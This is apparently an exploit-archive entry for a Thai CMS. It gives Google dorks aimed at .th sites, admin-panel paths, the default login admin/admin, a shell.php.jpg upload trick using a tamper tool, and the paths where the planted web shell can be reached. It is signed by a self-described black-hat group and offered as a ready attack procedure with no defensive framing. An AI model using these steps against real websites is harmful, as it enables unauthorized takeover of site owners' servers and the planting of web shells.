Thai CMS Administrator Bypass and Shell Upload

2018.06.01
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

############################################################## # Exploit Title: Thai CMS Administrator Bypass and Shell Upload # Google Dork 1: inurl:/administrator/modules/mod_photo/ # Google Dork 2: inurl:path/administrator/admin.php site:.th # Exploit Author: mr.Gh0st N@0b # Date: 1.6.2018 # Tested on: Window 10 ################################################################ # POC # Search with google dork # Open url # # Admin Panel # localhost/administrator/admin.phpp # localhost/path/administrator/admin.phpp # # Bypass # username "admin" password"admin" # Upload shell.php.jpg with Tamper # # Shell Path # localhost/administrator/modules/mod_photo/myphoto/yourshell.php # localhost/path/administrator/modules/mod_photo/myphoto/yourshell.php ##################################################### # mr.Gh0st N@0b # Myanmar Noob Hackers # Greetz to All Myanmar Black Hats # https://www.facebook.com/official.myanmar.noob.hackers/ #####################################################


Vote for this issue:
43%
57%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top